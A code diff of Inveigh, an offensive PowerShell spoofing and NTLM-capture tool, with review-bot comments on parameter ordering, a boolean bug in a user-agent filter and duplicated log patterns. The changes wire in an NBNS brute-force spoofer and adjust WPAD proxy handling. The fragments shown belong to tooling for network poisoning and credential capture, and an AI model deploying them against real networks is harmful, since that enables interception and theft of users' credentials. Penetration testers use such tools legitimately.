$inveigh.running = $true
if($StatusOutput -eq 'Y')
@@ -945,6 +946,10 @@ if($HTTP -eq 'Y' -or $HTTPS -eq 'Y')
{
$proxy_WPAD_IP = $IP
}
+ else
+ {
+ $proxy_WPAD_IP = $ProxyIP
+ }
if($WPADIP -and $WPADPort)
{
@@ -1330,7 +1335,7 @@ $SMB_NTLM_functions_scriptblock =
# HTTP Server ScriptBlock - HTTP/HTTPS/Proxy listener
$HTTP_scriptblock =
{
- param ($Challenge,$HTTPAuth,$HTTPBasicRealm,$HTTPContentType,$HTTPIP,$HTTPPort,$HTTPDefaultEXE,$HTTPDefaultFile,$HTTPDir,$HTTPResponse,$HTTPS_listener,$ProxyIgnore,$proxy_listener,$WPADAuth,$WPADResponse)
+ param ($Challenge,$HTTPAuth,$HTTPBasicRealm,$HTTPContentType,$HTTPIP,$HTTPPort,$HTTPDefaultEXE,$HTTPDefaultFile,$HTTPDir,$HTTPResponse,$HTTPS_listener,$NBNSBruteForcePause,$ProxyIgnore,$proxy_listener,$WPADAuth,$WPADResponse)
function NTLMChallengeBase64
{
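Review bot: Inserting `$NBNSBruteForcePause` into the middle of the positional `param` list at L358 silently shifts every later slot, and the scriptblock is fed by three separate `AddArgument` chains (HTTPListener, HTTPSListener, ProxyListener) that had to be edited in lockstep in this same commit; a future insertion that misses one chain would bind, for example, `$ProxyIgnore` into the `$proxy_listener` slot without any error. Passing the values by name, `.AddParameter('NBNSBruteForcePause',$NBNSBruteForcePause)` for each argument or a single hashtable through `.AddParameters()`, removes the ordering dependency. At minimum a comment above the param line, `# positional: order must match the AddArgument chains in HTTPListener, HTTPSListener and ProxyListener`, records the coupling. `$HTTP_scriptblock` continues well past the hunk.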
@@ -1576,8 +1581,8 @@ $HTTP_scriptblock =
if($ProxyIgnore.Count -gt 0 -and ($ProxyIgnore | ForEach-Object{$HTTP_header_user_agent.contains($_)}))
{
- $inveigh.console_queue.Add("$(Get-Date -format 's') - $HTTP_type ignoring wpad.dat request from $HTTP_source_IP")
- $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type ignoring wpad.dat request from $HTTP_source_IP")])
+ $inveigh.console_queue.Add("$(Get-Date -format 's') - $HTTP_type ignoring wpad.dat request due to user agent from $HTTP_source_IP")
+ $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type ignoring wpad.dat request due to user agent from $HTTP_source_IP")])
}
}
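Review bot: The guard on L362 treats `($ProxyIgnore | ForEach-Object{$HTTP_header_user_agent.contains($_)})` as a boolean, but ForEach-Object yields one result per entry and PowerShell evaluates an array of two or more elements as `$true` even when every element is `$false`; if ProxyIgnore can hold more than one user-agent string, every wpad.dat request would be ignored regardless of the agent. Filtering instead of mapping gives an empty, falsy result when nothing matches: `if($ProxyIgnore.Count -gt 0 -and ($ProxyIgnore | Where-Object {$HTTP_header_user_agent.Contains($_)}))`. `String.Contains` is also an ordinal, case-sensitive match, so an entry of `firefox` would not match `Firefox`; if case-insensitive matching is intended, `$HTTP_header_user_agent.IndexOf($_,[StringComparison]::OrdinalIgnoreCase) -ge 0` or a comment stating that entries are case-sensitive would settle it. The enclosing if/else inside `$HTTP_scriptblock` starts outside the hunk.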
@@ -3088,8 +3093,8 @@ function HTTPListener()
$HTTP_powershell.AddScript($HTTP_scriptblock).AddArgument($Challenge).AddArgument($HTTPAuth).AddArgument(
$HTTPBasicRealm).AddArgument($HTTPContentType).AddArgument($HTTPIP).AddArgument($HTTPPort).AddArgument(
$HTTPDefaultEXE).AddArgument($HTTPDefaultFile).AddArgument($HTTPDir).AddArgument(
- $HTTPResponse).AddArgument($HTTPS_listener).AddArgument($ProxyIgnore).AddArgument(
- $proxy_listener).AddArgument($WPADAuth).AddArgument($WPADResponse) > $null
+ $HTTPResponse).AddArgument($HTTPS_listener).AddArgument($NBNSBruteForcePause).AddArgument(
+ $ProxyIgnore).AddArgument($proxy_listener).AddArgument($WPADAuth).AddArgument($WPADResponse) > $null
$HTTP_powershell.BeginInvoke() > $null
}
@@ -3109,8 +3114,8 @@ function HTTPSListener()
$HTTPS_powershell.AddScript($HTTP_scriptblock).AddArgument($Challenge).AddArgument($HTTPAuth).AddArgument(
$HTTPBasicRealm).AddArgument($HTTPContentType).AddArgument($HTTPIP).AddArgument($HTTPSPort).AddArgument(
$HTTPDefaultEXE).AddArgument($HTTPDefaultFile).AddArgument($HTTPDir).AddArgument(
- $HTTPResponse).AddArgument($HTTPS_listener).AddArgument($ProxyIgnore).AddArgument(
- $proxy_listener).AddArgument($WPADAuth).AddArgument($WPADResponse) > $null
+ $HTTPResponse).AddArgument($HTTPS_listener).AddArgument($NBNSBruteForcePause).AddArgument(
+ $ProxyIgnore).AddArgument($proxy_listener).AddArgument($WPADAuth).AddArgument($WPADResponse) > $null
$HTTPS_powershell.BeginInvoke() > $null
}
@@ -3130,8 +3135,8 @@ function ProxyListener()
$proxy_powershell.AddScript($HTTP_scriptblock).AddArgument($Challenge).AddArgument($HTTPAuth).AddArgument(
$HTTPBasicRealm).AddArgument($HTTPContentType).AddArgument($ProxyIP).AddArgument($ProxyPort).AddArgument(
$HTTPDefaultEXE).AddArgument($HTTPDefaultFile).AddArgument($HTTPDir).AddArgument(
- $HTTPResponse).AddArgument($HTTPS_listener).AddArgument($ProxyIgnore).AddArgument(
- $proxy_listener).AddArgument($WPADAuth).AddArgument($WPADResponse) > $null
+ $HTTPResponse).AddArgument($HTTPS_listener).AddArgument($NBNSBruteForcePause).AddArgument(
+ $ProxyIgnore).AddArgument($proxy_listener).AddArgument($WPADAuth).AddArgument($WPADResponse) > $null
$proxy_powershell.BeginInvoke() > $null
}
@@ -3262,6 +3267,12 @@ elseif(($LLMNR -eq 'Y' -or $NBNS -eq 'Y' -or $SMB -eq 'Y') -and !$elevated_privi
}
+# NBNSBruteForce Spoofer Start
+if($NBNSBruteForce -eq 'Y')
+{
+ NBNSBruteForceSpoofer
+}
+
# Control Loop Start
if($RunCount -or $RunTime -or $inveigh.file_output -or $NBNSBruteForcePause)
{
@@ -3292,7 +3303,7 @@ if($inveigh.console_output)
$inveigh.console_queue.RemoveAt(0)
}
- {$_ -like "* spoofer is disabled" -or $_ -like "* local request" -or $_ -like "* host header *" -or $_ -like "* user agent *"}
+ {$_ -like "* spoofer is disabled" -or $_ -like "* local request" -or $_ -like "* host header *" -or $_ -like "* user agent received *"}
{
if($ConsoleOutput -eq 'Y')
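Review bot: Narrowing the pattern at L415 to `* user agent received *` means the message text introduced elsewhere in this commit, `... ignoring wpad.dat request due to user agent from ...`, no longer matches this branch (it would have matched the old `* user agent *`), so it now falls to whichever branch handles unmatched messages; if that is the intent it is worth recording, because the message strings live in `$HTTP_scriptblock` roughly 1,700 lines earlier and the same pattern list is duplicated in the second console loop near line 3780. A comment on the pattern line, `# keep in sync with console_queue message text in $HTTP_scriptblock; same list is repeated in the tool-mode loop below`, or hoisting the patterns into one variable used by both loops, would stop the two copies drifting as messages are reworded. The switch statement starts and ends outside the hunk.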
@@ -3769,7 +3780,7 @@ if($inveigh.tool -ne 1)
$inveigh.console_queue.RemoveAt(0)
}
- {$_ -like "* spoofer is disabled" -or $_ -like "* local request" -or $_ -like "* host header *" -or $_ -like "* user agent *"}
+ {$_ -like "* spoofer is disabled" -or $_ -like "* local request" -or $_ -like "* host header *" -or $_ -like "* user agent received *"}
{
if($ConsoleOutput -eq 'Y')